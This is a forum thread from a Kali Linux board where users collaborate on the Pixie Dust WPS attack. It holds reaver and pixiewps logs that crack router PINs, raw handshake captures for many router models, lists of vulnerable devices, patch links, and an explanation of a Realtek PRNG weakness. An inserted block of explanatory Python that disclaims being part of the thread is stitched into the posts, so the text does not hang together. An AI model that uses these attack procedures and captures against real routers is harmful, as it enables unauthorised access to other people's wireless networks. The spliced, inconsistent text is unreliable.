Thanks soxrok2212.
Add to the database as attack successful.
Arris models:
TG1672
DG1670
Used in the Time Warner footprint. Model not listed on wikidevi. Chipset not listed in the chip UID database.
I would guess ralink chipset.
Reaver mod list wps manufacturer - "Celeno Communication, Inc.", model - "CL1800".
Are you using pixiewps? Because if you use that and it says E-S1 and E-S2 = 00000000, then it's Ralink. Otherwise it's Broadcom.
yes pixiewps. ralink
E-S1 and E-S2 = 00000000, shown
Sweet thanks! I'll add them to the database
TG862G seems to be a bit of a hit-or-miss, this one did not accept the "secret" pin, but was still vulnerable.
I've still yet to come across one that accepted both pins.
Code:
[P] E-Nonce: b1:55:f2:0b:09:dd:44:63:8b:f2:e1:94:d8:90:5e:e0
[P] PKE: bd:98:1b:00:24:0a:08:96:85:92:9c:5b:21:e8:bf:7e:2e:f3:0f:6c:ea:c1:4d:85:ba:af:58:7e:63:c4:f0:92:ef:8a:90:f4:d4:5a:b0:59:33:18:ae:ac:31:9e:a0:ed:b8:16:fe:bd:9c:b6:e1:aa:0e:5a:72:c8:9d:31:89:0b:ed:1f:45:e5:34:8c:ea:74:d5:35:f4:4a:13:1d:92:81:fd:e9:4d:42:88:4b:ea:ed:ef:ff:16:aa:c0:4f:3b:8f:fe:bc:f5:e7:ec:96:7e:c7:06:4b:5a:3b:20:0a:7b:72:14:4b:75:b1:25:2e:b9:a7:41:e9:4c:67:87:07:2b:a4:7a:c6:02:c2:91:9a:60:10:d8:5e:ca:fb:87:26:b2:3f:ca:3e:94:16:3c:7c:d6:60:e1:54:11:78:78:d6:f6:95:01:10:a8:ed:11:bf:12:52:85:cc:02:77:32:2a:d3:2d:63:e3:bd:23:a1:dc:27:98:55:4c:c5:5a:ae:d4:8b:48
[P] WPS Manufacturer: ARRIS
[P] WPS Model Number: RT2860
[+] Received M1 message
[P] AuthKey: d5:c6:8d:34:3b:bf:9f:33:24:15:c4:3a:39:f7:84:73:b8:f1:1e:ea:02:fc:b2:1e:6f:65:fe:56:ac:df:8a:9d
[+] Sending M2 message
[P] E-Hash1: 74:d7:4f:96:17:d9:77:0e:2d:7e:d7:3b:67:a6:e1:0a:cb:ab:eb:f9:23:bd:69:a6:59:f2:ff:1d:27:c8:fc:8b
[P] E-Hash2: f1:2e:03:65:55:9f:9c:21:73:e5:a7:4b:0a:27:ca:fe:46:d1:49:8c:c8:9b:9d:f1:17:70:61:b7:c3:8b:3d:34
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 11 seconds
[+] WPS PIN: '56276053'
[+] WPA PSK: 'PASSWORD_HERE'
[+] AP SSID: 'HOME-XXXX'
[+] Nothing done, nothing to save.
EDIT: Noticed this one had a different chipset than the others I've seen, maybe the "secret" pin is more revision or chipset specific?
Wish i could change my nick to what it was when i was a dev on the (now very defunct) knoppix-std team...
Last edited by aanarchyy; 2015-04-08 at 05:16.
If you want to manually patch reaver yourself:
Reaver v1.4 (Official release) #r119 ~ 2013-10-20
Homepage: https://code.google.com/p/reaver-wps/
Patch: http://pastebin.com/raw.php?i=mkeKYppU
Reaver v1.5 (Community fork) #8 - 2014-01-04
Homepage: https://code.google.com/p/reaver-wps-fork/
Patch: http://pastebin.com/raw.php?i=gQFcBbtW
This is a Kali-Linux support forum - not general IT/infosec help.
Useful Commands: OS, Networking, Hardware, Wi-Fi
Troubleshooting: Kali-Linux Installation, Repository, Wi-Fi Cards (Official Docs)
Hardware: Recommended 802.11 Wireless Cards
Documentation: http://docs.kali.org/ (Offline PDF version)
Bugs Reporting & Tool Requests: https://bugs.kali.org/
Kali Tool List, Versions & Man Pages: https://tools.kali.org/
For what it's worth, both pixiewps and the patched version of reaver have made it into the Kali repos:
PixieWPS (New): https://bugs.kali.org/view.php?id=2203
Reaver (Patched): https://bugs.kali.org/view.php?id=2210
soxrok2212, I tried messaging you on the Google Drive sheet but it looked as though you couldn't respond...
Another one to add to the list as vulnerable:
Zyxel P-2812HNU - Wikidevi here
Code:
[P] WPS Manufacturer: ZyXEL Technology, Corp.
[P] WPS Model Number: V3.11(TUJ.3)
[+] Received M1 message
[P] AuthKey: 85:5f:fc:cb:b8:...
[+] Sending M2 message
[P] E-Hash1: 66:29:ae:09:ab:...
[P] E-Hash2: 81:a4:d5:58:f3:...
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 3 seconds
[+] WPS PIN: '37********'
[+] WPA PSK: '**********'
[+] AP SSID: '**********'
[+] Nothing done, nothing to save.
Last edited by Calamita; 2015-04-08 at 18:07.
Why doesn't it work on Broadcoms? I thought that the exploit was for Broadcoms.
model number 123456
Is that helping you work on that flaw you mentioned you found?
BTW heres the one for that Encore i posted the other day
Code:
[P] E-Nonce: 0f:2f:e4:f3:ed:a6:74:d5:97:d6:33:b9:0b:e2:4c:21
[P] PKE: ef:80:72:86:a3:e9:5e:11:ac:93:cf:68:2f:d6:75:ad:d1:b8:eb:b9:b4:b4:0a:2b:72:e4:f5:ca:70:76:6f:70:25:76:9a:f2:34:75:31:07:b8:24:36:2d:28:b1:8f:47:bb:d5:a5:d9:e7:6f:30:f6:ce:c5:80:55:ae:ba:0a:e9:22:67:22:b9:69:27:71:a1:8b:2d:a6:ff:55:52:de:5d:95:ff:50:e3:eb:e8:d9:a3:f8:7a:cd:d0:d2:ec:a0:ec:5f:6f:87:de:56:28:80:d5:68:c6:c3:c2:0d:55:8d:43:8a:fd:b8:5c:d0:35:0c:13:28:32:27:18:17:89:a8:4c:44:45:04:8b:1b:ba:0a:b2:c3:17:e4:80:73:00:6a:6c:fd:9b:fb:97:83:84:76:a8:22:77:fc:c3:84:78:00:76:2d:1d:74:f5:02:f6:5d:b3:d4:d5:9a:e0:df:f8:19:b3:db:6d:75:c1:3b:13:f8:b3:86:9f:a4:09:ff:82:d6:c1
[P] WPS Manufacturer: ENCORE Technologies, Inc.
[P] WPS Model Number: ENHWI-3GN3
[P] AuthKey: c3:d9:55:00:ba:6c:b1:1f:fc:d1:eb:68:e1:1a:30:52:de:ef:a2:ca:ca:be:eb:78:c9:3b:df:0a:02:03:9f:e1
[P] E-Hash1: 1b:25:bf:af:80:54:60:aa:b9:c6:22:34:2d:f7:c3:20:6b:ef:fe:09:d6:97:17:56:bb:4b:e0:38:ed:38:9a:96
[P] E-Hash2: 62:b5:b4:d2:17:32:c8:00:33:65:2e:a1:83:8b:2b:e7:68:b3:3e:fb:76:4f:6c:5f:7e:bb:16:71:56:8e:04:ac
Cisco Linksys RE1000 v2, vulnerable.
E-S1, E-S2 = 00:00:00:00:00... Ralink chipset. wikidevi here
Last edited by nuroo; 2015-04-08 at 20:48.
Will do! I saw your post on hackforums about this too PM me your details and I'll forward any info I find to you
This is all the info I need.
Optional but extremely helpful information:
Code:
Authkey:
N1 Enrollee Nonce:
N2 Registrar Nonce:
PKe:
E-Hash1:
E-Hash2:
Code:
Router Manufacturer:
Router Model Name/Number:
Router WPS Pin:
Last edited by soxrok2212; 2015-05-06 at 21:28.
****, sorry. Didn't even notice...
14:CF:E2:AC:E7:50
Manufacturer: Celeno Communication, Inc.
Model Number: CL1800
WPS Pin: 28944294
Vulnerable!
We need to know: model of chipset.
Model of chipset shown in the probes.
Thanks for your collaboration.
Probe request or M1 message in a WPS exchange.
Check your messages, soxrok2212
How do I make the reaver (forked) spill out the PKR too?
We weren't able to find where in reaver the PKR is debugged. It's probably in there somewhere but we just use small DH keys because the value is always 2. If you really need it without DH keys, just look in the M2 message with Wireshark... "Public Key"
So many of you probably know that I was looking into Realtek recently, and I noticed some fishy stuff that they do. First of all, Realtek APs ALL generated the SAME PKe. Not just on 1 occasion, not just on 1 AP, but multiple. All generated the same PKe. This seemed very strange and insecure. A person could find the secret number used in the DH Key exchange and this could be used for a MITM attack for instance, but it is not the actual problem.
Anyways, I contacted Dominique, sent him some test data from a Realtek AP, a firmware blablabla, and he came back to me with the conclusion that Realtek can be cracked in 2 different, but similar ways.
1- Assuming the attacker does a WPS exchange in 1 second, E-S1 = E-S2 = N1 Enrollee Nonce
Wow, stupid engineering right? The actual PRNG is found here: https://github.com/skristiansson/uCl...lib/random_r.c
The seed that this generator uses is the time. So assuming everything happens in 1 second, your E-S1 and E-S2 will equal the N1 Enrollee Nonce.
2- If your exchange doesn't happen within 1 second, you can simply brute force the seed for the PRNG (kinda similar to Broadcom). All you have to do is input different times. Then, you will have E-S1 and E-S2.
Amazing. And they thought this was a secure implementation? Nope.
The only drawback for this attack is you can't use small PKr DH Keys so at the moment, you need Wireshark or just do a hex dump to get the PKr. Not that big of a deal though. Wiire updated pixiewps within about 10 minutes of me telling him all the info and has already released it, what a champ!
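As an added illustration of the failure mode described in this post (it is not Realtek's firmware code, not pixiewps, and not anything posted in this thread), the block below models a nonce source that re-seeds a deterministic PRNG from the wall-clock second on every call, next to the fixed pattern that draws every value from the OS CSPRNG. `random.Random` stands in for the uClibc `random_r()` the post links; the property being shown is the re-seeding, not the specific algorithm. Function names and the timestamp are assumptions of mine.

```python
import random
import secrets

NONCE_LEN = 16  # bytes in a WPS nonce and in each E-S value


def time_seeded_nonce(unix_second: int) -> bytes:
    """Weak pattern: build a fresh generator seeded with the current second.

    Every call made within the same second rebuilds the same generator state,
    so it hands back the same 16 bytes. Deterministic on purpose: this is the
    behaviour the post attributes to the time-seeded PRNG."""
    rng = random.Random(unix_second)
    return rng.getrandbits(8 * NONCE_LEN).to_bytes(NONCE_LEN, "big")


def wps_values_weak(unix_second: int):
    """Model of an enrollee deriving N1, E-S1 and E-S2 inside one second."""
    n1 = time_seeded_nonce(unix_second)
    es1 = time_seeded_nonce(unix_second)
    es2 = time_seeded_nonce(unix_second)
    return n1, es1, es2


def secrets_are_predictable(unix_second: int) -> bool:
    """True when E-S1 and E-S2 equal the public enrollee nonce N1, i.e. the
    values that are supposed to stay secret are already in the M1 message."""
    n1, es1, es2 = wps_values_weak(unix_second)
    return es1 == n1 and es2 == n1


def wps_values_secure():
    """Fixed pattern: each value drawn independently from the OS CSPRNG, so
    knowing N1 says nothing about E-S1 or E-S2."""
    return (secrets.token_bytes(NONCE_LEN),
            secrets.token_bytes(NONCE_LEN),
            secrets.token_bytes(NONCE_LEN))


def secure_values_distinct() -> bool:
    n1, es1, es2 = wps_values_secure()
    return len({n1, es1, es2}) == 3


if __name__ == "__main__":
    t = 1428500000  # constructed timestamp; any second behaves the same way
    print("time-seeded source: E-S1/E-S2 == N1 ->", secrets_are_predictable(t))
    print("next second differs ->", time_seeded_nonce(t) != time_seeded_nonce(t + 1))
    print("CSPRNG source: all three distinct ->", secure_values_distinct())
```

The second print shows why the post's case 1 needs the whole exchange inside one second: a different second gives a different seed, which is exactly the dependency the post's case 2 describes. The defensive fix is simply to never derive nonces or DH secrets from a generator whose seed is guessable.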
More awesome work all!
I've not found any Realtek AP's yet - which manufacturer have you gathered data from at the moment?
Right now I've only tested a Belkin F9k1105v2. I had other data to try but unfortunately they used small DH keys. Somehow, small DH keys screw up Realtek cracking. Not sure why but otherwise it does work
I think this one is Realtek; the wiki page shows it's Realtek but Reaver just shows the name of the router itself.
Here is the info:
Authkey: d3:91:85:00:01:57:be:86:5e:52:10:fe:73:ff:ae:c1:15:0d:d3:01:99:15:67:5a:b1:ba:a0:bb:85:c3:bf:f2
N1 Enrollee Nonce: 3a:ad:19:14:4f:5a:1d:87:1f:27:ed:1b:3c:fb:a6:18
PKe: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
E-Hash1: 83:b9:24:05:e4:d2:60:c0:c3:15:7f:70:59:e2:e0:0c:86:54:1b:7b:81:d8:50:4c:f4:01:2e:6d:f7:3f:08:8b
E-Hash2: 40:8c:4d:b0:82:29:32:04:6e:7e:f6:91:78:65:4d:3d:dd:9a:18:26:f7:28:1b:ff:32:0b:05:e4:a6:9b:17:f1
PKr: 87:10:92:c3:7c:dd:9d:00:ba:80:18:16:20:d4:f4:60:d6:1e:1d:f2:fe:7f:e6:ed:c5:4d:49:c6:a1:82:4a:9b:f2:05:9f:6b:27:d6:f2:ee:24:e2:1e:12:66:d5:02:25:48:92:7e:5c:3e:9d:78:2d:b2:af:49:3b:af:4f:dd:62:e0:28:00:6b:4c:09:62:6e:c3:19:6e:e3:c2:c6:45:44:e2:50:0d:40:b9:0f:a6:cc:ae:13:0e:56:10:2a:c0:07:55:1e:db:07:ad:fc:29:ef:1a:ce:59:a9:ad:27:7d:0b:73:2b:4f:1c:17:17:de:cd:06:7c:31:34:91:e6:09:ee:97:68:67:68:66:6f:c0:05:bf:f3:a3:4e:25:1a:fd:39:a2:9a:02:86:7d:0d:4d:c1:80:b5:da:22:f7:04:1f:12:98:e4:ad:27:56:d4:49:8a:9f:1b:01:d6:39:dd:61:c2:53:09:99:0a:dd:f9:a0:fa:3b:3e:f3:7c:f3:7b:81:f3
Router Manufacturer: Technicolor
Router Model Name/Number: Technicolor TD5
Wanna help. The modded reaver makes getting the necessary keys super easy. The Realtek attack needs more info than modded reaver gives.
Is there a tool that will extract all needed data, easily for a noob? I want to help, not sure how to use wireshark.
Last edited by nuroo; 2015-04-11 at 12:41.
FrankenScript could do that. I'll ask Slim to add it in the next version, if it's ok with everyone, whenever he gets back...
Kali Linux USB Installation using LinuxLive USB Creator
Howto Install HDD Kali on a USB Key
Clean your laptop fan | basic knowledge
Manufacturer
Belkin International
Model
F9K1103
pixiewps attack works, small DH keys used. (good thing, can't understand Wireshark yet)
wikidevi here
WI1 chip1: Ralink RT3883
WI2 chip1: Ralink RT3092
I'm working on a modification of reaver to automate the whole process.
I'll post it soon.
This is an example:
[+] Switching mon0 to channel 9
[?] Restore previous session for 64:70:02:535:FA? [n/Y] n
[+] Waiting for beacon from 64:70:02:535:FA
[+] Associated with 64:70:02:535:FA (ESSID: t6)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: d7:5b:a5:c1:be:a9:23:da:......
[P] PKE: d5:2e:5f:2e:58:ee:d0:3e:f2:d0:18:bc:a2:c9:be:da:91:6e:b5:81:0f:5a:ee:30:0f:7b:00:ea:bf:86:73:86:b8:ff:24:f7:........
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 1.0
[+] Received M1 message
[P] PKR: 01:38:b1:f2:38:52:5f:cc:8a:e5:0e:00:30:5f:15:b2:e3:88:86:68:1c:c1:b4:6d:a9:80:45:dd:c8:cd:07:8a:a1:18:45:.......
[+] Sending M2 message
[P] E-Hash1: ee:a0:46:ba:b1:e3:80:29:cd:80:0b:b2:e2:..........
[P] E-Hash2: 59:43:8b:93:7a:79:b1:d9:ef:7a:d6:b0:50:.....
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
I added you on skype soxrok2212
VULNERABLE:
Model: Hitron CVE 360
WPS Manufacturer: Ralink Technology, Corp.
WPS Model Number: RT2860
E-Nonce: 0e:3e:ee:d8:97:3d:a4:f1:ed:8d:b6:3a:9c:31:b2:30
PKE: f0:bc:40:a6:c4:8f:85:eb:e0:6b:47:96:f3:7f:7c:bd:34:a2:cd:ed:c6:79:09:f7:6f:de:75:a1:b9:4c:ef:ff:0c:be:ff:81:e1:f6:6c:76:33:c7:6e:3c:58:79:36:af:71:b8:20:a9:3b:11:03:0c:b9:ef:ff:3e:d8:23:29:49:62:13:8a:ae:1c:24:74:bf:71:89:dd:b4:ea:a7:2d:eb:04:83:fd:17:d8:84:a3:b9:11:bf:63:d8:6a:56:59:4c:bd:a2:9a:44:e8:72:95:06:82:0a:af:d3:de:45:8a:ef:6d:23:ad:35:12:64:39:49:e5:ab:f1:c0:07:f8:5b:5d:00:c9:d5:39:8c:ac:79:c5:7a:40:29:fb:f5:a6:e3:c6:e5:57:cb:50:25:ce:f1:18:8c:ae:b4:25:c3:4a:c8:5b:c3:aa:76:21:53:b3:a1:19:14:c0:34:b8:61:21:67:c2:fa:7c:b1:a4:6a:8c:95:97:c3:fd:4c:26:d1:97:54:52
AuthKey: 76:f9:c0:a7:4c:dc:7a:c5:2e:65:56:02:a6:df:0d:62:0d:9a:3f:a0:7a:d4:fb:94:af:72:4b:92:f1:26:3e:70
E-Hash1: 4d:0d:e2:7b:b0:0e:7b:4a:15:81:a6:0a:e1:4c:91:3d:73:a2:c7:2e:30:45:69:89:0d:cb:0f:ab:97:d9:7f:f1
E-Hash2: d7:df:23:9a:7d:20:74:80:fe:e6:1b:eb:00:19:49:43:35:8e:05:72:0f:e0:dd:5c:45:a9:a4:a5:dc:e0:09:14
NOT VULNERABLE:
Model: E1000 - Linksys
Chip: Broadcom BCM4716B0 (300 MHz)
E-Nonce: f1:04:09:09:1b:b4:a2:57:17:9a:f9:07:4b:a4:a5:70
PKE: 96:4e:dd:2c:9e:8a:a4:4d:77:cf:e5:31:65:39:9d:08:15:c8:da:8c:33:74:37:96:eb:b1:e5:83:b2:d4:fe:79:ee:cf:8b:7f:46:f3:c8:0e:01:04:ab:0c:f6:f5:b1:d2:11:8c:ad:7a:4d:3d:b7:98:cb:75:4b:d7:37:37:01:05:a8:b4:63:49:18:e2:2f:99:52:90:4a:54:9e:98:89:e3:d1:97:11:36:a0:c8:da:9f:19:05:28:a1:5f:66:03:d4:21:a3:eb:be:b0:58:8e:8b:6b:48:c9:df:b4:a9:af:23:e5:ed:40:77:dc:c2:ee:c9:2f:c7:c7:a5:1e:79:ad:d4:34:fc:00:b3:f1:eb:6d:e9:64:6a:d7:7b:97:ea:d2:77:a3:e4:19:4b:64:00:ce:6e:7b:06:02:6c:21:11:cb:8b:a5:a2:e8:8e:8f:54:5f:c7:23:5e:08:5d:00:4a:e1:94:e0:84:0e:6d:50:d5:8b:f7:46:53:a2:32:22:cf:5a:f7
PKR: 28:bc:09:26:90:73:5f:24:bb:23:9a:89:49:b5:aa:9e:30:cd:98:60:eb:5e:52:a8:08:82:e4:75:b7:3f:84:5b:87:a6:b0:f6:d2:9e:4d:9e:0e:c7:0e:99:b7:69:1e:d7:7b:11:4e:a8:d0:42:77:b8:48:43:36:b6:ec:2f:0f:4c:c3:03:98:c8:18:3b:07:1c:b4:7a:17:80:90:25:93:91:b5:16:4f:0a:83:95:36:92:95:63:a1:fb:50:41:18:b3:c8:4d:bc:a5:43:32:87:93:a4:27:1d:b7:aa:08:7d:1f:7b:f7:20:20:e8:a7:e9:af:29:9c:44:95:af:7d:aa:02:81:bb:29:71:34:67:07:57:c8:64:7a:01:f3:26:7f:98:a3:0a:27:aa:b8:b8:ab:40:39:60:3a:51:82:ac:de:60:e5:ad:2a:bf:e5:2c:9d:b4:2a:fb:ec:16:a2:b6:7f:03:bb:0e:bb:65:16:72:e8:86:3b:af:03:1d:57:87:ea:26
AuthKey: 98:e5:4a:b4:53:ad:1b:9a:56:ff:df:5c:65:0d:1d:0d:1b:6c:b3:8f:ec:a8:7e:c2:d4:34:28:96:e4:ee:5a:85
E-Hash1: 2a:5e:0d:41:71:48:2e:bf:42:c0:c7:5d:78:6e:d5:d5:0c:51:82:20:21:91:b2:2d:f0:74:e4:14:f5:fa:a9:fd
E-Hash2: 63:c7:21:cb:d7:7c:1d:0c:50:55:22:de:0e:e4:7c:d4:4a:94:7c:b7:61:97:07:7f:ed:0c:7c:7f:99:ba:4e:d0
Model: TL-WR841N - TP-Link
E-Nonce: 9b:0f:a4:49:82:5b:5b:ff:ea:e6:ee:dc:15:75:f1:bc
PKE: e5:dd:ed:96:42:29:30:4c:d5:fe:00:94:4a:6c:44:d5:f9:f3:72:f4:e1:cd:83:3d:4b:7c:00:e2:0b:33:95:a5:75:1b:8c:0e:f4:0a:36:a6:1c:2d:63:36:fd:47:9a:65:3f:4a:26:3c:13:ac:85:75:01:31:94:cc:29:a2:ac:0b:eb:1a:2c:5c:36:63:65:15:17:c2:36:6e:4a:71:65:be:ca:bd:d5:86:6b:db:f7:90:38:cd:a2:95:1f:af:12:eb:24:af:f1:62:7c:df:8f:2a:bb:94:98:5e:65:62:39:8a:19:75:fa:ac:dd:98:36:f0:77:44:fe:59:9d:65:3a:cd:ed:d1:b7:52:c0:ed:93:99:a1:8d:54:5b:55:c5:8a:c0:0f:1e:c9:5e:e9:cc:bd:b8:1e:88:e9:6d:06:a4:21:35:cc:a5:30:40:5d:4d:08:e3:aa:92:0a:fd:0a:84:0f:d5:11:07:2e:fe:05:e3:70:72:ea:fa:b9:93:60:85:8d:bf
AuthKey: 6c:fa:cd:30:17:d5:ee:87:b4:c7:ff:c9:de:8e:20:7c:95:27:f6:62:f5:16:48:55:84:04:ef:85:33:40:54:43
E-Hash1: 89:c6:62:2d:c8:c3:b7:24:ef:ca:c7:79:2a:83:0e:f5:ed:9c:1d:a4:fd:20:b2:e1:61:a7:81:c1:f9:30:40:01
E-Hash2: cd:a0:79:3b:4e:12:f9:e2:c8:e7:14:34:51:3a:2d:75:eb:0f:c8:42:0b:de:4d:1d:1e:29:e1:4b:bd:d1:d7:72
PKR: 28:bf:b7:94:77:e4:c2:9d:0e:f8:60:1e:d1:0f:22:24:50:b4:c9:06:26:86:62:ea:cb:6d:66:8e:92:ee:a2:8a:0f:66:c2:72:cc:25:43:32:ee:d5:b6:37:02:f7:9f:9c:7d:5b:93:5b:b9:49:7b:1e:fd:20:87:5a:d8:ea:55:55:52:e9:bc:56:0f:82:d2:61:fb:4f:e3:08:bd:10:52:36:8c:81:c9:e8:0b:97:c0:bd:10:30:72:cc:20:d2:31:6a:f2:8a:c0:7c:a6:c2:8c:ae:43:0a:eb:0b:e0:13:76:40:91:ec:aa:55:46:83:f3:b3:c2:d8:1a:e5:20:16:a4:6c:68:d9:b0:68:e2:ef:35:74:d4:25:f3:a9:71:1c:19:e7:82:d3:c7:96:e7:33:1d:97:20:5e:8c:58:71:ac:8f:33:3c:2a:d8:55:f6:74:51:1b:ff:e8:19:e0:8a:95:ad:53:03:40:a6:70:f7:22:b2:42:47:e3:1b:0d:28:64:a5:15
Model: TL-WR1043ND - TP-Link
E-Nonce: 75:28:e8:1e:7e:9f:35:42:53:96:21:31:72:56:0d:12
PKE: 5f:48:b9:03:9b:ca:ce:5e:f2:50:05:5f:a8:ed:84:5a:91:39:ce:b8:3c:f9:c9:0b:14:67:2d:f5:8d:72:86:d7:41:d5:b2:4e:41:fd:9e:a2:8d:a5:5a:c2:70:78:e7:83:ab:98:49:c2:c1:0a:17:4f:e1:b3:58:ee:71:e1:b1:99:33:69:07:1b:3a:96:b7:dd:a6:8b:31:ce:0d:8a:a1:1a:63:ee:5b:d3:d9:d4:27:cb:95:e8:22:ac:89:f1:d3:ba:cc:f2:8c:0d:18:1b:e3:d9:77:df:bb:cf:dd:1e:13:81:26:b1:b3:4a:8c:85:06:40:17:29:04:04:d2:d2:5b:41:12:62:de:2d:ed:5c:94:81:c0:21:18:c1:f6:5e:5c:9e:71:e5:66:44:12:fb:da:38:56:de:ec:c7:58:36:93:ee:b5:b0:72:5c:68:c1:81:c1:8f:b0:c9:41:9f:d1:0a:72:92:56:d9:af:c5:d3:e4:78:b9:e7:91:66:d9:7e:8b:fb
PKR: 5f:45:13:03:8f:b9:52:a0:d4:6b:bf:5e:c2:54:7a:9f:1d:d8:47:19:ca:0f:47:71:3a:c4:ce:18:6c:1e:91:0f:2e:c3:c1:60:1a:91:41:09:49:98:c1:d3:65:ab:15:21:39:1d:69:bd:1a:5a:7e:ad:fb:f7:a7:c2:bb:65:3d:62:2e:02:fb:ea:31:23:4e:18:e4:77:24:da:6c:92:d6:d2:f0:ef:7a:4e:6c:3e:df:c4:c5:57:a6:67:93:6b:38:15:7e:05:77:fa:f9:b4:35:06:5f:b5:6c:5a:0f:36:e0:6a:79:4b:e2:65:1b:03:cc:22:10:80:83:90:59:f4:ae:1f:41:f8:e4:ef:d3:01:f6:ad:17:b2:6d:04:51:57:53:3d:55:78:c4:69:50:3c:11:db:e1:d2:f2:0f:9b:23:9c:81:2f:27:c6:bd:b8:3f:8d:b5:e7:5f:4f:63:3a:85:72:24:43:48:63:1e:95:08:c1:44:66:9a:11:43:6a:03:45:a4
AuthKey: 75:bf:65:6f:e9:51:a9:f9:6c:8a:ec:fa:1a:96:6b:52:19:4c:22:6c:e5:e3:5c:c8:72:b9:bc:78:45:ba:e4:f8
E-Hash1: a0:34:b8:48:57:38:23:ea:8a:29:b7:c9:15:b3:8f:c8:52:87:2f:08:7e:c9:57:e8:52:04:b5:f6:18:2d:71:4c
E-Hash2: b5:99:8a:6d:85:4b:63:e7:91:af:5b:be:4a:19:7e:eb:e7:9c:04:3d:7c:6a:c2:2d:56:66:4b:f1:6a:47:a4:17
Model: TL-WR1043 - TP-Link
E-Nonce: d4:1c:7d:7f:a7:9d:31:9f:a2:16:fb:4e:e2:6f:a2:80
PKE: 5c:08:ff:c8:9f:3b:96:1d:9d:89:28:5a:9d:bf:8d:06:12:f6:a1:5f:01:7e:e0:34:e8:b0:d8:d8:c4:ff:be:00:c4:81:50:03:1b:a2:ac:b4:22:e2:49:71:fa:ff:01:2c:74:62:4e:15:ad:4c:40:7d:1a:6a:af:f9:63:4f:f0:6d:f1:1b:56:7f:47:15:94:8b:28:80:a2:dd:0a:28:a3:46:05:57:5f:16:cd:e7:25:b7:50:e6:f9:f4:00:e8:35:6d:c4:15:82:c2:2a:4d:8b:e2:63:2d:a1:cb:db:cd:c6:3e:8a:60:12:2e:a8:53:96:0c:ca:8c:82:5e:42:f9:aa:db:4f:f0:de:8a:37:5c:0d:b5:4f:7d:bb:47:a9:62:58:3d:db:31:e4:be:68:39:5a:92:f9:75:9b:e6:50:ae:27:df:87:83:62:42:f1:13:3a:d5:a7:66:8c:cb:3c:9f:12:1d:76:0b:6d:eb:a5:84:73:8a:60:33:19:ac:2a:74:2c:f8
AuthKey: 2f:0c:46:3c:ad:a0:35:b5:83:ab:02:9e:b7:ec:91:47:e4:00:d9:ee:60:4d:40:49:76:92:eb:9f:1a:e3:84:cb
E-Hash1: 3c:72:7a:a4:9e:42:30:e2:81:1a:04:ef:e7:40:fd:de:f3:b7:eb:0a:82:ad:0e:82:9d:b8:3f:a8:d0:d9:b5:06
E-Hash2: a4:cb:f4:96:31:fc:1f:2a:7e:7a:b2:6b:b3:1b:aa:2a:0a:87:d2:54:60:07:1b:4b:0e:d7:7a:f2:c6:a4:fc:7e
PKR: da:ab:2e:3f:67:b2:0c:e6:69:9f:13:68:e6:3a:78:c5:c8:d7:ab:60:0f:1c:57:5f:e4:bd:b0:76:0d:a7:20:3f:0a:b4:9f:2e:80:99:fa:06:fa:46:03:03:ea:7c:d4:fa:f8:a6:ca:cc:74:e9:18:f7:f2:54:d2:e9:10:71:2f:5a:b6:71:df:1f:dc:d2:67:c8:19:45:41:d9:f7:a1:fc:e8:95:0c:92:cd:59:4e:ae:5d:68:98:b3:8d:82:dc:ca:cc:ca:b8:79:35:fa:a4:e0:5d:85:13:31:a2:ea:99:8d:bd:82:2c:b4:7a:35:92:1a:84:c7:99:e8:0f:96:69:d0:14:5e:dc:31:09:3b:a3:da:65:56:54:ad:4a:d3:1a:9e:e4:98:17:98:d4:29:c0:8b:7c:75:30:b7:c8:fe:4a:65:5c:38:5b:1c:71:2e:35:a2:de:07:52:2e:6f:01:e0:1a:60:e6:b8:22:92:ca:62:cf:a7:4e:6a:46:62:43:48:f0:42
Model: WNR2000v4 - Netgear
Chip: Atheros AR9341
E-Nonce: 99:a2:d2:0d:f9:9d:f8:35:da:4b:a7:6d:6a:01:85:23
PKE: ac:e6:d0:a0:d3:17:7b:b0:d0:69:bc:37:23:d9:1a:2e:dc:cb:8d:e7:de:fe:22:89:04:1e:34:5d:1d:f9:5a:25:b4:15:0f:43:c3:b2:22:97:4c:b6:8f:ec:9d:31:91:0a:76:bc:20:98:d6:22:db:71:dc:82:6d:df:8c:19:12:6d:ad:0f:3a:88:54:83:68:97:ae:27:18:39:84:f5:46:15:4f:f7:38:20:60:80:56:42:76:48:d6:d3:b8:79:88:56:ca:4d:d5:29:1a:47:1c:78:0d:31:fb:aa:23:fb:03:ee:cf:be:77:bf:2e:7d:f2:06:2d:11:f9:47:20:97:08:79:c3:47:1c:13:58:cd:35:a1:76:a3:eb:71:14:c4:7e:39:7a:e5:15:95:b1:fa:40:7d:b0:e2:e4:8a:af:eb:de:67:5e:c6:05:0d:3d:13:9d:9c:49:c4:46:a1:92:60:d7:27:a4:e2:b1:6d:52:79:da:29:c7:45:93:13:0b:e4:28:b5
AuthKey: b8:e6:b4:e6:73:e1:92:32:e1:87:11:d6:0c:10:0e:3f:05:d4:b8:6c:0d:53:b8:50:c5:3f:d2:95:1f:6a:ab:98
